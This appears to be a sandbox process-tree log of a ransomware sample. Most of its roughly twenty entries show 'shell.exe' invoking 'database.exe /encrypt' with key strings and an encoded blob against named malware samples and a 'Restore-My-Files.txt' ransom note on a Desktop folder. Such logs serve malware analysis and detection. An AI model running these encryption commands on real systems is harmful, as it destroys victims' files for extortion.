C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Restore-My-Files.txt"5⤵PID:4420
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.MSIL.Agent.fqnw-d1afbbebb8c29d49b2bec1b5e01cec2d786dc36ede052c35b61978fe3dca1102.gif"5⤵PID:880
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.fpnf-bc26d4efe4a5f638a12e88f589d0097e67d71c73273fedd2ede0dfe4a41c39df.gif"5⤵PID:3808
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe"5⤵PID:6420
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe"5⤵PID:3972
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe"5⤵PID:5564
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe.gif"5⤵PID:4640
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe.gif"5⤵PID:3416
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe.gif"5⤵PID:4872
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe.gif"5⤵PID:1648
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe"5⤵PID:616
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe.gif"5⤵PID:4604
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe"5⤵PID:6016
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe.id-DA208E5B.[[email protected]].gamma"5⤵PID:4016
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe.gif"5⤵PID:6076
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe"5⤵PID:3068
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe"5⤵PID:5952
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"5⤵PID:2560
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe"5⤵PID:2716
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe.gif"5⤵PID:2660
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe.gif"5⤵PID:3740
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe"5⤵PID:5664
-
-
